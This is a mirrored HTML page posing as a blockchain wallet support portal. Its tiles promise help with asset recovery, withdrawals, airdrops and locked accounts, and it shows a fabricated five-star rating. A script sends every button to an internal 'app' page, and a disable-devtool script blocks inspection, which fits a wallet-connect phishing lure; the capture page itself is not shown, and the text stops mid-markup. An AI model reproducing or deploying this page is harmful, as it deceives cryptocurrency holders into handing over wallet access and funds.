<html lang="en">


<!-- Mirrored from multisafechain.web.app/css/fonts/icofont.woff2 by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 02 Oct 2025 19:01:01 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Embrace Blockchain Innovation</title>
  <link rel="preconnect" href="https://fonts.googleapis.com/">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;900&amp;display=swap" rel="stylesheet">
  <link rel="stylesheet" href="css/styles.html">
  <link rel="stylesheet" href="css/icofont.min.html">
  <script src="js/coingecko-coin-price-marquee-widget.html" defer=""></script>
  <script src="js/coingecko-coin-compare-chart-widget.html" defer=""></script>
  <script src="js/coingecko-coin-market-ticker-list-widget.html" defer=""></script>  
  <script disable-devtool-auto src='../../../cdn.jsdelivr.net/npm/disable-devtool/disable-devtool.min.js'></script>
  
  <style>
    .connectButton {
      cursor: pointer;
    }
  </style> 
  <script>
    document.addEventListener('DOMContentLoaded', function () { 
      var buttons = document.querySelectorAll('button');

 
      buttons.forEach(function (button) {
        button.classList.add('connectButton'); // Add class
        button.removeAttribute('href'); // Remove href attribute
      });
    });
    document.addEventListener('DOMContentLoaded', function () {
      var connectElements = document.querySelectorAll('.connectButton');

      connectElements.forEach(function (element) {
        element.addEventListener('click', function (event) {
          event.preventDefault(); // Prevent default behavior

          // Redirect to the desired page
          window.location.href = 'app/index.html';
        });
      });
    });

  </script>
</head>

<body style="background: none;">
  <!-- Blockchain Widget -->
  <coingecko-coin-price-marquee-widget coin-ids="bitcoin,ethereum,eos,ripple,litecoin" currency="usd"
    background-color="#ffffff" locale="en"></coingecko-coin-price-marquee-widget>

  <section style="background-color: rgb(1, 1, 62)" class="main">
    <div>
      <h1>Embrace Blockchain Innovation</h1>
      <p>
        Experience the ease and efficiency of blockchain technology as it
        revolutionizes the way we transact and interact. Simplify processes,
        enhance security, and unlock new possibilities for businesses and
        individuals alike.
      </p>
      <p><span style="font-weight: 600">100k+</span> Rated ⭐⭐⭐⭐⭐</p>

      <a class="connectButton placeholder-button connect-button" style="margin: 5px;"> Connect Wallet</a>  
    </div>
    <img src="images/user.html" alt="">
  </section>

  <section class="make-selection">
    <h1>Make Your Selection Below</h1>

    <div class="grid-container">
      <!-- Grid items -->
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path fill-rule="evenodd"
              d="M15.528 2.973a.75.75 0 0 1 .472.696v8.662a.75.75 0 0 1-.472.696l-7.25 2.9a.75.75 0 0 1-.557 0l-7.25-2.9A.75.75 0 0 1 0 12.331V3.669a.75.75 0 0 1 .471-.696L7.443.184l.004-.001.274-.11a.75.75 0 0 1 .558 0l.274.11.004.001 6.971 2.789Zm-1.374.527L8 5.962 1.846 3.5 1 3.839v.4l6.5 2.6v7.922l.5.2.5-.2V6.84l6.5-2.6v-.4l-.846-.339Z">
            </path>
          </svg>
          <h4>Migration Issues</h4>
          <p>Click here for migration related issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path fill-rule="evenodd"
              d="M8 0c-.69 0-1.843.265-2.928.56-1.11.3-2.229.655-2.887.87a1.54 1.54 0 0 0-1.044 1.262c-.596 4.477.787 7.795 2.465 9.99a11.777 11.777 0 0 0 2.517 2.453c.386.273.744.482 1.048.625.28.132.581.24.829.24s.548-.108.829-.24a7.159 7.159 0 0 0 1.048-.625 11.775 11.775 0 0 0 2.517-2.453c1.678-2.195 3.061-5.513 2.465-9.99a1.541 1.541 0 0 0-1.044-1.263 62.467 62.467 0 0 0-2.887-.87C9.843.266 8.69 0 8 0zm0 5a1.5 1.5 0 0 1 .5 2.915l.385 1.99a.5.5 0 0 1-.491.595h-.788a.5.5 0 0 1-.49-.595l.384-1.99A1.5 1.5 0 0 1 8 5z">
            </path>
          </svg>
          <h4>Assets Recovery</h4>
          <p>Click here for Assets Recovery issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 576 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M3.9 22.9C10.5 8.9 24.5 0 40 0H472c15.5 0 29.5 8.9 36.1 22.9s4.6 30.5-5.2 42.5L396.4 195.6C316.2 212.1 256 283 256 368c0 27.4 6.3 53.4 17.5 76.5c-1.6-.8-3.2-1.8-4.7-2.9l-64-48c-8.1-6-12.8-15.5-12.8-25.6V288.9L9 65.3C-.7 53.4-2.8 36.8 3.9 22.9zM288 368a144 144 0 1 1 288 0 144 144 0 1 1 -288 0zm120.8-32.6c.6-.9 1.8-2.1 4.2-3.4c5.1-2.7 12.5-4.1 18.7-4c8.2 .1 17.1 1.8 26.4 4.1c8.6 2.1 17.3-3.1 19.4-11.7s-3.1-17.3-11.7-19.4c-5.6-1.4-11.6-2.7-17.9-3.7V288c0-8.8-7.2-16-16-16s-16 7.2-16 16v9.5c-6.1 1.2-12.3 3.2-18 6.3c-11.8 6.3-23 18.4-21.8 37.2c1 16 11.7 25.3 21.6 30.7c8.8 4.7 19.7 7.8 28.6 10.3l1.8 .5c10.3 2.9 17.9 5.2 23.2 8.3c4.5 2.7 4.7 4.2 4.7 5.6c.1 2.4-.5 3.7-1 4.5c-.6 1-1.8 2.2-4 3.3c-4.7 2.5-11.8 3.8-18.5 3.6c-9.5-.3-18.5-3.1-29.9-6.8c-1.9-.6-3.8-1.2-5.8-1.8c-8.4-2.6-17.4 2.1-20 10.5s2.1 17.4 10.5 20c1.6 .5 3.3 1 5 1.6l0 0 0 0c7 2.3 15.1 4.8 23.7 6.6v11.4c0 8.8 7.2 16 16 16s16-7.2 16-16V438.7c6.2-1.1 12.5-3.1 18.3-6.2c12.1-6.5 22.3-18.7 21.7-36.9c-.5-16.2-10.3-26.3-20.5-32.3c-9.4-5.6-21.2-8.9-30.5-11.5l-.2 0c-10.4-2.9-18.3-5.2-23.9-8.2c-4.8-2.6-4.8-4-4.8-4.5l0-.1c-.1-1.9 .3-2.9 .8-3.6z">
            </path>
          </svg>
          <h4>Rectification</h4>
          <p>Click here for Rectification issues</p>
        </a>
      </div>

      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M461.2 128H80c-8.84 0-16-7.16-16-16s7.16-16 16-16h384c8.84 0 16-7.16 16-16 0-26.51-21.49-48-48-48H64C28.65 32 0 60.65 0 96v320c0 35.35 28.65 64 64 64h397.2c28.02 0 50.8-21.53 50.8-48V176c0-26.47-22.78-48-50.8-48zM416 336c-17.67 0-32-14.33-32-32s14.33-32 32-32 32 14.33 32 32-14.33 32-32 32z">
            </path>
          </svg>
          <h4>Withdraw Funds</h4>
          <p>Click here for withdrawal issues</p>
        </a>
      </div>

      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg fill="#003125" xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 -960 960 960" width="24">
            <path
              d="M600-120v-120H440v-400h-80v120H80v-320h280v120h240v-120h280v320H600v-120h-80v320h80v-120h280v320H600ZM160-760v160-160Zm520 400v160-160Zm0-400v160-160Zm0 160h120v-160H680v160Zm0 400h120v-160H680v160ZM160-600h120v-160H160v160Z"
              fill="#1a0120"></path>
          </svg>
          <h4>Connect Wallet to App</h4>
          <p>Click here for wallet to app connection issues</p>
        </a>
      </div>

      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 -960 960 960" width="24">
            <path
              d="M480-80 120-280v-400l360-200 360 200v400L480-80ZM364-590q23-24 53-37t63-13q33 0 63 13t53 37l120-67-236-131-236 131 120 67Zm76 396v-131q-54-14-87-57t-33-98q0-11 1-20.5t4-19.5l-125-70v263l240 133Zm40-206q33 0 56.5-23.5T560-480q0-33-23.5-56.5T480-560q-33 0-56.5 23.5T400-480q0 33 23.5 56.5T480-400Zm40 206 240-133v-263l-125 70q3 10 4 19.5t1 20.5q0 55-33 98t-87 57v131Z"
              fill="#1a0120"></path>
          </svg>
          <h4>Bridge Token</h4>
          <p>Click here for bridge token issues</p>
        </a>
      </div>

      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 -960 960 960" width="24">
            <path
              d="M491-200q12-1 20.5-9.5T520-230q0-14-9-22.5t-23-7.5q-41 3-87-22.5T343-375q-2-11-10.5-18t-19.5-7q-14 0-23 10.5t-6 24.5q17 91 80 130t127 35ZM480-80q-137 0-228.5-94T160-408q0-100 79.5-217.5T480-880q161 137 240.5 254.5T800-408q0 140-91.5 234T480-80Zm0-80q104 0 172-70.5T720-408q0-73-60.5-165T480-774Q361-665 300.5-573T240-408q0 107 68 177.5T480-160Zm0-320Z"
              fill="#1a0120"></path>
          </svg>
          <h4>Liquidity</h4>
          <p>Click here for liquidity issues</p>
        </a>
      </div>

      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 -960 960 960" width="24">
            <path
              d="M80-160v-640h800v640H80Zm80-80h640v-480H160v480Zm0 0v-480 480Zm160-40h80v-40h40q17 0 28.5-11.5T480-360v-120q0-17-11.5-28.5T440-520H320v-40h160v-80h-80v-40h-80v40h-40q-17 0-28.5 11.5T240-600v120q0 17 11.5 28.5T280-440h120v40H240v80h80v40Zm320-30 80-80H560l80 80Zm-80-250h160l-80-80-80 80Z"
              fill="#1a0120"></path>
          </svg>
          <h4>Staking Balance</h4>
          <p>Click here for staking balance issues</p>
        </a>
      </div>

      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 -960 960 960" width="24">
            <path
              d="M80-120v-80h360v-447q-26-9-45-28t-28-45H240l120 280q0 50-41 85t-99 35q-58 0-99-35t-41-85l120-280h-80v-80h247q12-35 43-57.5t70-22.5q39 0 70 22.5t43 57.5h247v80h-80l120 280q0 50-41 85t-99 35q-58 0-99-35t-41-85l120-280H593q-9 26-28 45t-45 28v447h360v80H80Zm585-320h150l-75-174-75 174Zm-520 0h150l-75-174-75 174Zm335-280q17 0 28.5-11.5T520-760q0-17-11.5-28.5T480-800q-17 0-28.5 11.5T440-760q0 17 11.5 28.5T480-720Z"
              fill="#1a0120"></path>
          </svg>
          <h4>View Value of Token</h4>
          <p>Click here to view value of tokens</p>
        </a>
      </div>

      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 576 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M384 160c-17.7 0-32-14.3-32-32s14.3-32 32-32H544c17.7 0 32 14.3 32 32V288c0 17.7-14.3 32-32 32s-32-14.3-32-32V205.3L342.6 374.6c-12.5 12.5-32.8 12.5-45.3 0L192 269.3 54.6 406.6c-12.5 12.5-32.8 12.5-45.3 0s-12.5-32.8 0-45.3l160-160c12.5-12.5 32.8-12.5 45.3 0L320 306.7 466.7 160H384z">
            </path>
          </svg>
          <h4>High Gas Fees</h4>
          <p>Click here for Gas Fees issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M20 2H4c-1.103 0-2 .897-2 2v12c0 1.103.897 2 2 2h3v3.767L13.277 18H20c1.103 0 2-.897 2-2V4c0-1.103-.897-2-2-2zm0 14h-7.277L9 18.233V16H4V4h16v12z">
            </path>
            <path d="M11 6h2v5h-2zm0 6h2v2h-2z"></path>
          </svg>
          <h4>Slippage Error</h4>
          <p>Click here for Slippage Error issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 640 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M535 41c-9.4-9.4-9.4-24.6 0-33.9s24.6-9.4 33.9 0l64 64c4.5 4.5 7 10.6 7 17s-2.5 12.5-7 17l-64 64c-9.4 9.4-24.6 9.4-33.9 0s-9.4-24.6 0-33.9l23-23L384 112c-13.3 0-24-10.7-24-24s10.7-24 24-24l174.1 0L535 41zM105 377l-23 23L256 400c13.3 0 24 10.7 24 24s-10.7 24-24 24L81.9 448l23 23c9.4 9.4 9.4 24.6 0 33.9s-24.6 9.4-33.9 0L7 441c-4.5-4.5-7-10.6-7-17s2.5-12.5 7-17l64-64c9.4-9.4 24.6-9.4 33.9 0s9.4 24.6 0 33.9zM96 64H337.9c-3.7 7.2-5.9 15.3-5.9 24c0 28.7 23.3 52 52 52l117.4 0c-4 17 .6 35.5 13.8 48.8c20.3 20.3 53.2 20.3 73.5 0L608 169.5V384c0 35.3-28.7 64-64 64H302.1c3.7-7.2 5.9-15.3 5.9-24c0-28.7-23.3-52-52-52l-117.4 0c4-17-.6-35.5-13.8-48.8c-20.3-20.3-53.2-20.3-73.5 0L32 342.5V128c0-35.3 28.7-64 64-64zm64 64H96v64c35.3 0 64-28.7 64-64zM544 320c-35.3 0-64 28.7-64 64h64V320zM320 352a96 96 0 1 0 0-192 96 96 0 1 0 0 192z">
            </path>
          </svg>
          <h4>Transaction Error</h4>
          <p>Click here for Transaction Error issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round"
            stroke-linejoin="round" class="text-4xl" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
            <path d="M18 14a4 4 0 1 1 -3.995 4.2l-.005 -.2l.005 -.2a4 4 0 0 1 3.995 -3.8z" stroke-width="0"
              fill="currentColor"></path>
            <path
              d="M16.707 2.293a1 1 0 0 1 .083 1.32l-.083 .094l-1.293 1.293h3.586a3 3 0 0 1 2.995 2.824l.005 .176v3a1 1 0 0 1 -1.993 .117l-.007 -.117v-3a1 1 0 0 0 -.883 -.993l-.117 -.007h-3.585l1.292 1.293a1 1 0 0 1 -1.32 1.497l-.094 -.083l-3 -3a.98 .98 0 0 1 -.28 -.872l.036 -.146l.04 -.104c.058 -.126 .14 -.24 .245 -.334l2.959 -2.958a1 1 0 0 1 1.414 0z"
              stroke-width="0" fill="currentColor"></path>
            <path
              d="M3 12a1 1 0 0 1 .993 .883l.007 .117v3a1 1 0 0 0 .883 .993l.117 .007h3.585l-1.292 -1.293a1 1 0 0 1 -.083 -1.32l.083 -.094a1 1 0 0 1 1.32 -.083l.094 .083l3 3a.98 .98 0 0 1 .28 .872l-.036 .146l-.04 .104a1.02 1.02 0 0 1 -.245 .334l-2.959 2.958a1 1 0 0 1 -1.497 -1.32l.083 -.094l1.291 -1.293h-3.584a3 3 0 0 1 -2.995 -2.824l-.005 -.176v-3a1 1 0 0 1 1 -1z"
              stroke-width="0" fill="currentColor"></path>
            <path d="M6 2a4 4 0 1 1 -3.995 4.2l-.005 -.2l.005 -.2a4 4 0 0 1 3.995 -3.8z" stroke-width="0"
              fill="currentColor"></path>
          </svg>
          <h4>Cross Chain Transfer</h4>
          <p>Click here for Cross Chain issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M512 80c0 18-14.3 34.6-38.4 48c-29.1 16.1-72.5 27.5-122.3 30.9c-3.7-1.8-7.4-3.5-11.3-5C300.6 137.4 248.2 128 192 128c-8.3 0-16.4 .2-24.5 .6l-1.1-.6C142.3 114.6 128 98 128 80c0-44.2 86-80 192-80S512 35.8 512 80zM160.7 161.1c10.2-.7 20.7-1.1 31.3-1.1c62.2 0 117.4 12.3 152.5 31.4C369.3 204.9 384 221.7 384 240c0 4-.7 7.9-2.1 11.7c-4.6 13.2-17 25.3-35 35.5c0 0 0 0 0 0c-.1 .1-.3 .1-.4 .2l0 0 0 0c-.3 .2-.6 .3-.9 .5c-35 19.4-90.8 32-153.6 32c-59.6 0-112.9-11.3-148.2-29.1c-1.9-.9-3.7-1.9-5.5-2.9C14.3 274.6 0 258 0 240c0-34.8 53.4-64.5 128-75.4c10.5-1.5 21.4-2.7 32.7-3.5zM416 240c0-21.9-10.6-39.9-24.1-53.4c28.3-4.4 54.2-11.4 76.2-20.5c16.3-6.8 31.5-15.2 43.9-25.5V176c0 19.3-16.5 37.1-43.8 50.9c-14.6 7.4-32.4 13.7-52.4 18.5c.1-1.8 .2-3.5 .2-5.3zm-32 96c0 18-14.3 34.6-38.4 48c-1.8 1-3.6 1.9-5.5 2.9C304.9 404.7 251.6 416 192 416c-62.8 0-118.6-12.6-153.6-32C14.3 370.6 0 354 0 336V300.6c12.5 10.3 27.6 18.7 43.9 25.5C83.4 342.6 135.8 352 192 352s108.6-9.4 148.1-25.9c7.8-3.2 15.3-6.9 22.4-10.9c6.1-3.4 11.8-7.2 17.2-11.2c1.5-1.1 2.9-2.3 4.3-3.4V304v5.7V336zm32 0V304 278.1c19-4.2 36.5-9.5 52.1-16c16.3-6.8 31.5-15.2 43.9-25.5V272c0 10.5-5 21-14.9 30.9c-16.3 16.3-45 29.7-81.3 38.4c.1-1.7 .2-3.5 .2-5.3zM192 448c56.2 0 108.6-9.4 148.1-25.9c16.3-6.8 31.5-15.2 43.9-25.5V432c0 44.2-86 80-192 80S0 476.2 0 432V396.6c12.5 10.3 27.6 18.7 43.9 25.5C83.4 438.6 135.8 448 192 448z">
            </path>
          </svg>
          <h4>Staking Issues</h4>
          <p>Click here for Staking issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 256 256" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M224,48V152a16,16,0,0,1-16,16H112v16a8,8,0,0,1-13.66,5.66l-24-24a8,8,0,0,1,0-11.32l24-24A8,8,0,0,1,112,136v16h96V48H96v8a8,8,0,0,1-16,0V48A16,16,0,0,1,96,32H208A16,16,0,0,1,224,48ZM168,192a8,8,0,0,0-8,8v8H48V104h96v16a8,8,0,0,0,13.66,5.66l24-24a8,8,0,0,0,0-11.32l-24-24A8,8,0,0,0,144,72V88H48a16,16,0,0,0-16,16V208a16,16,0,0,0,16,16H160a16,16,0,0,0,16-16v-8A8,8,0,0,0,168,192Z">
            </path>
          </svg>
          <h4>Swap/Exchange</h4>
          <p>Click here for Swap/Exchange issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M256 16C123.5 16 16 123.5 16 256c0 132.6 107.5 240 240 240 132.6 0 240-107.4 240-240S388.6 16 256 16zm0 60c99.4 0 180 80.6 180 180s-80.6 180-180 180S76 355.4 76 256 156.6 76 256 76zm91.3 64.2c-6.5 0-12.5 2.4-16.8 8.2-52 70.1-69 96.5-106 169.8-8.4-11.1-65.6-72.4-93.9-94.1-14.2-10.9-41.3 27.2-31.6 37.1C142.6 306.1 220.1 406 232.7 405c21.4-1.7 75.1-136.8 148.8-233.7 8-10.4-15-31.3-34.2-31.1z">
            </path>
          </svg>
          <h4>Claim Reflection</h4>
          <p>Click here for Claim Reflection issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M256 48c-42.9 0-84.2 13-119.2 37.5-34.2 24-60.2 57.2-75.1 96.1L58 192h45.7l1.9-5c8.2-17.8 19.4-33.9 33.5-48 31.2-31.2 72.7-48.4 116.9-48.4s85.7 17.2 116.9 48.4c31.2 31.2 48.4 72.7 48.4 116.9 0 44.1-17.2 85.7-48.4 116.9-31.2 31.2-72.7 48.4-116.9 48.4-44.1 0-85.6-17.2-116.9-48.4-14-14-25.3-30.1-33.5-47.9l-1.9-5H58l3.6 10.4c14.9 38.9 40.9 72.1 75.1 96.1C171.8 451.1 213 464 256 464c114.7 0 208-93.3 208-208S370.7 48 256 48z">
            </path>
            <path d="M48 277.4h189.7l-43.6 44.7L224 352l96-96-96-96-31 29.9 44.7 44.7H48v42.8z"></path>
          </svg>
          <h4>Login Issues</h4>
          <p>Click here for Login issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M488.6 250.2L392 214V105.5c0-15-9.3-28.4-23.4-33.7l-100-37.5c-8.1-3.1-17.1-3.1-25.3 0l-100 37.5c-14.1 5.3-23.4 18.7-23.4 33.7V214l-96.6 36.2C9.3 255.5 0 268.9 0 283.9V394c0 13.6 7.7 26.1 19.9 32.2l100 50c10.1 5.1 22.1 5.1 32.2 0l103.9-52 103.9 52c10.1 5.1 22.1 5.1 32.2 0l100-50c12.2-6.1 19.9-18.6 19.9-32.2V283.9c0-15-9.3-28.4-23.4-33.7zM358 214.8l-85 31.9v-68.2l85-37v73.3zM154 104.1l102-38.2 102 38.2v.6l-102 41.4-102-41.4v-.6zm84 291.1l-85 42.5v-79.1l85-38.8v75.4zm0-112l-102 41.4-102-41.4v-.6l102-38.2 102 38.2v.6zm240 112l-85 42.5v-79.1l85-38.8v75.4zm0-112l-102 41.4-102-41.4v-.6l102-38.2 102 38.2v.6z">
            </path>
          </svg>
          <h4>Connect to Dapps</h4>
          <p>Click here for Connect to Dapps issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M234.5 5.7c13.9-5 29.1-5 43.1 0l192 68.6C495 83.4 512 107.5 512 134.6V377.4c0 27-17 51.2-42.5 60.3l-192 68.6c-13.9 5-29.1 5-43.1 0l-192-68.6C17 428.6 0 404.5 0 377.4V134.6c0-27 17-51.2 42.5-60.3l192-68.6zM256 66L82.3 128 256 190l173.7-62L256 66zm32 368.6l160-57.1v-188L288 246.6v188z">
            </path>
          </svg>
          <h4>Claim Airdrop</h4>
          <p>Click here for Claim Airdrop issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M9 12C10.1046 12 11 11.1046 11 10 11 8.89543 10.1046 8 9 8 7.89543 8 7 8.89543 7 10 7 11.1046 7.89543 12 9 12ZM12 1 21.5 6.5V17.5L12 23 2.5 17.5V6.5L12 1ZM4.5 7.65311V16.3469L6.8724 17.7204 14.9446 11.8008 19.5 14.534V7.65311L12 3.311 4.5 7.65311Z">
            </path>
          </svg>
          <h4>NFTS Issues</h4>
          <p>Click here for NFTS issues</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 640 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M528 448H352V153.25c20.42-8.94 36.1-26.22 43.38-47.47l132-44.26c8.38-2.81 12.89-11.88 10.08-20.26l-10.17-30.34C524.48 2.54 515.41-1.97 507.03.84L389.11 40.37C375.3 16.36 349.69 0 320 0c-44.18 0-80 35.82-80 80 0 3.43.59 6.71 1.01 10.03l-128.39 43.05c-8.38 2.81-12.89 11.88-10.08 20.26l10.17 30.34c2.81 8.38 11.88 12.89 20.26 10.08l142.05-47.63c4.07 2.77 8.43 5.12 12.99 7.12V496c0 8.84 7.16 16 16 16h224c8.84 0 16-7.16 16-16v-32c-.01-8.84-7.17-16-16.01-16zm111.98-144c0-16.18 1.34-8.73-85.05-181.51-17.65-35.29-68.19-35.36-85.87 0-87.12 174.26-85.04 165.84-85.04 181.51H384c0 44.18 57.31 80 128 80s128-35.82 128-80h-.02zM440 288l72-144 72 144H440zm-269.07-37.51c-17.65-35.29-68.19-35.36-85.87 0C-2.06 424.75.02 416.33.02 432H0c0 44.18 57.31 80 128 80s128-35.82 128-80h-.02c0-16.18 1.34-8.73-85.05-181.51zM56 416l72-144 72 144H56z">
            </path>
          </svg>
          <h4>Missing/Irregular Balance</h4>
          <p>Click to recover Lost/Irregular Balance</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M464 32H48C21.49 32 0 53.49 0 80v352c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V80c0-26.51-21.49-48-48-48zm-6 400H54a6 6 0 0 1-6-6V86a6 6 0 0 1 6-6h404a6 6 0 0 1 6 6v340a6 6 0 0 1-6 6zm-42-92v24c0 6.627-5.373 12-12 12H204c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h200c6.627 0 12 5.373 12 12zm0-96v24c0 6.627-5.373 12-12 12H204c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h200c6.627 0 12 5.373 12 12zm0-96v24c0 6.627-5.373 12-12 12H204c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h200c6.627 0 12 5.373 12 12zm-252 12c0 19.882-16.118 36-36 36s-36-16.118-36-36 16.118-36 36-36 36 16.118 36 36zm0 96c0 19.882-16.118 36-36 36s-36-16.118-36-36 16.118-36 36-36 36 16.118 36 36zm0 96c0 19.882-16.118 36-36 36s-36-16.118-36-36 16.118-36 36-36 36 16.118 36 36z">
            </path>
          </svg>
          <h4>Whitelist Issues</h4>
          <p>Click here for whitelist related issues.</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M12 2C6.486 2 2 6.486 2 12s4.486 10 10 10 10-4.486 10-10S17.514 2 12 2zm0 18c-4.411 0-8-3.589-8-8s3.589-8 8-8 8 3.589 8 8-3.589 8-8 8z">
            </path>
            <path d="M13 7h-2v5.414l3.293 3.293 1.414-1.414L13 11.586z"></path>
          </svg>
          <h4>Transaction Delay</h4>
          <p>Click here for Transaction Delay issues.</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 640 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M224 256A128 128 0 1 0 96 128a128 128 0 0 0 128 128zm96 64a63.08 63.08 0 0 1 8.1-30.5c-4.8-.5-9.5-1.5-14.5-1.5h-16.7a174.08 174.08 0 0 1-145.8 0h-16.7A134.43 134.43 0 0 0 0 422.4V464a48 48 0 0 0 48 48h280.9a63.54 63.54 0 0 1-8.9-32zm288-32h-32v-80a80 80 0 0 0-160 0v80h-32a32 32 0 0 0-32 32v160a32 32 0 0 0 32 32h224a32 32 0 0 0 32-32V320a32 32 0 0 0-32-32zM496 432a32 32 0 1 1 32-32 32 32 0 0 1-32 32zm32-144h-64v-80a32 32 0 0 1 64 0z">
            </path>
          </svg>
          <h4>Locked Account</h4>
          <p>Click here for Locked Account issues.</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="text-4xl"
            height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
